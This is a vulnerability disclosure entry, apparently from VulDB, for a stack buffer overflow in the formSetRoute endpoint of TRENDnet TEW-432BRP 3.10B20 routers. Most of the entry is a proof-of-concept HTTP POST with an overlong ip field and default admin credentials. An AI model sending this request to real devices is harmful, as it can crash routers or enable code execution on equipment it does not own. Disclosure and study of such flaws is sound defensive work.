Submeter #814758: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflowinformação

TítuloTRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
DescriçãoIn formSetRoute function, ip、mask、gateway is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the ip、mask、gateway to execute arbitrary code. POST /goform/formSetRoute HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 980 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/routing_static.asp?t=1777300029926 Upgrade-Insecure-Requests: 1 edit_row=-1&ip=192.168.100.0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mask=x.x.x.x&gateway=192.168.10.50&iface=0&metric=1&add=Add&webpage=routing_static.asp&cur_ipaddr=192.168.10.1&cur_netmask=x.x.x.x&Action=
Fonte⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_3/3.md
Utilizador
 pjqwudi_Buoy (UID 97665)
Submissão28/04/2026 09h06 (há 1 mês)
Moderação29/05/2026 10h20 (1 month later)
EstadoAceite
Entrada VulDB367148 [TRENDnet TEW-432BRP 3.10B20 /goform/formSetRoute ip/mask/gateway Excesso de tampão]
Pontos20

VoltarVisão GeralPróximo

Do you know our Splunk app?

Download it now for free!